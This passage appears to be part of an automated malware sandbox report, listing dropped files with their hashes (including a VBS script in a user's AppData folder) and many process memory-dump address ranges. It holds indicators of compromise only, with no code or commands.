        b8c31ec59d3a208d1b93cb6413217e4bbc47741753dec0a063c08073563b03ed

        SHA512

        e329acb576912de06c840e4210957db633866c14b0918670c5e1dd32d27e8bf100fbf785fc300df05812ba61331bec2b735a5b3d07d2f319d511cb93ed407143

      • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

        Filesize

        20KB

        MD5

        26108074b394ad52811c2626b69dbacb

        SHA1

        1a4edf89865199963c06d145c8fddafd0afe6b5c

        SHA256

        a6f4fb5d869731b3aaa806e261ef22353130ee6a94867824f4f2dcdccd80e510

        SHA512

        f4e248c483aa93dc4804b67fdca97292bda127f87fdf89d9896ca480b52275f56e305f810ec4c23c6d10982ccaf9bedf845341c993ed95ee7c9106a4feb66b2c

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

        Filesize

        7KB

        MD5

        132e46370e69153be7f1297d4113eaed

        SHA1

        78a66c3c1781eb3394b9570d4c7189dacc70fea1

        SHA256

        230a0c4e80b8fa1722203b903b7835decd5795e46bd9148a9f6c2fe76a13a91a

        SHA512

        1003c3028c3fbc51455c5a719b38632e59cf1291c8a5a0bfc940a584df98b457e06bc8f3a62406980e2a2106831627659175f95eb0f7738d17b29b62dc9c9e24

      • C:\Users\Admin\AppData\Roaming\imagainetheloverkiss.vbs

        Filesize

        3KB

        MD5

        ff4db2579ed496ceaf72d40b073d02d9

        SHA1

        dec514afeb8e99746f2ba626c6fe54325a81ce68

        SHA256

        c223fd75c66e0974c57977f240d2e73778568aa40281eb35ae08ea9f411b43e8

        SHA512

        61381180acf0526e8bb2a1747455bfc057a651aa1468901e8404da7e87971d118d791138dfbfc493c420d92a18a34bb15799ad27cb57fcfb4b016b70c62ea02c

      • \??\PIPE\srvsvc

        MD5

        d41d8cd98f00b204e9800998ecf8427e

        SHA1

        da39a3ee5e6b4b0d3255bfef95601890afd80709

        SHA256

        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

        SHA512

        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

      • memory/744-113-0x000000006A670000-0x000000006AC1B000-memory.dmp

        Filesize

        5.7MB

      • memory/744-114-0x0000000002200000-0x0000000002240000-memory.dmp

        Filesize

        256KB

      • memory/744-115-0x000000006A670000-0x000000006AC1B000-memory.dmp

        Filesize

        5.7MB

      • memory/744-230-0x000000006A670000-0x000000006AC1B000-memory.dmp

        Filesize

        5.7MB

      • memory/744-192-0x000000006A670000-0x000000006AC1B000-memory.dmp

        Filesize

        5.7MB

      • memory/1072-279-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/1072-263-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/1072-283-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/1072-284-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/1072-257-0x0000000000400000-0x0000000000424000-memory.dmp

        Filesize

        144KB

      • memory/1584-285-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/1584-267-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/1584-265-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/1584-261-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/1584-254-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/1584-249-0x0000000000400000-0x0000000000462000-memory.dmp

        Filesize

        392KB

      • memory/1584-245-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

        Filesize

        4KB

      • memory/1768-258-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/1768-244-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/1768-272-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/1768-256-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/1768-260-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/1768-251-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/1768-248-0x0000000000400000-0x0000000000478000-memory.dmp

        Filesize

        480KB

      • memory/2540-318-0x000000007299D000-0x00000000729A8000-memory.dmp

        Filesize

        44KB

      • memory/2540-3-0x000000002F341000-0x000000002F342000-memory.dmp

        Filesize

        4KB

      • memory/2540-5-0x000000007299D000-0x00000000729A8000-memory.dmp

        Filesize

        44KB

      • memory/2540-7-0x0000000003820000-0x0000000003822000-memory.dmp

        Filesize

        8KB

      • memory/2540-124-0x000000007299D000-0x00000000729A8000-memory.dmp

        Filesize

        44KB

      • memory/2732-233-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-280-0x0000000010000000-0x0000000010019000-memory.dmp

        Filesize

        100KB

      • memory/2732-232-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-208-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-234-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-235-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-236-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-237-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-239-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-238-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-241-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-210-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-228-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-212-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-290-0x0000000010000000-0x0000000010019000-memory.dmp

        Filesize

        100KB

      • memory/2732-226-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-287-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-214-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-224-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

        Filesize

        4KB

      • memory/2732-216-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-278-0x0000000010000000-0x0000000010019000-memory.dmp

        Filesize

        100KB

      • memory/2732-222-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-220-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2732-277-0x0000000010000000-0x0000000010019000-memory.dmp

        Filesize

        100KB

      • memory/2732-274-0x0000000010000000-0x0000000010019000-memory.dmp

        Filesize

        100KB

      • memory/2732-218-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/2800-229-0x000000006A670000-0x000000006AC1B000-memory.dmp

        Filesize

        5.7MB

      • memory/2800-122-0x0000000002720000-0x0000000002760000-memory.dmp

        Filesize

        256KB

      • memory/2800-123-0x000000006A670000-0x000000006AC1B000-memory.dmp

        Filesize

        5.7MB

      • memory/2800-121-0x000000006A670000-0x000000006AC1B000-memory.dmp

        Filesize

        5.7MB

      • memory/2800-202-0x000000006A670000-0x000000006AC1B000-memory.dmp

        Filesize

        5.7MB

      • memory/2844-112-0x000000007299D000-0x00000000729A8000-memory.dmp

        Filesize

        44KB

      • memory/2844-321-0x000000007299D000-0x00000000729A8000-memory.dmp

        Filesize

        44KB

      • memory/2844-8-0x0000000002390000-0x0000000002392000-memory.dmp

        Filesize

        8KB

      • memory/2844-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/2844-1-0x000000007299D000-0x00000000729A8000-memory.dmp

        Filesize

        44KB

      • memory/2876-198-0x000000006A670000-0x000000006AC1B000-memory.dmp

        Filesize

        5.7MB

      • memory/2876-201-0x00000000026F0000-0x0000000002730000-memory.dmp

        Filesize

        256KB

      • memory/2876-200-0x000000006A670000-0x000000006AC1B000-memory.dmp

        Filesize

        5.7MB

      • memory/2876-199-0x00000000026F0000-0x0000000002730000-memory.dmp

        Filesize

        256KB

      • memory/2876-205-0x000000006A670000-0x000000006AC1B000-memory.dmp

        Filesize

        5.7MB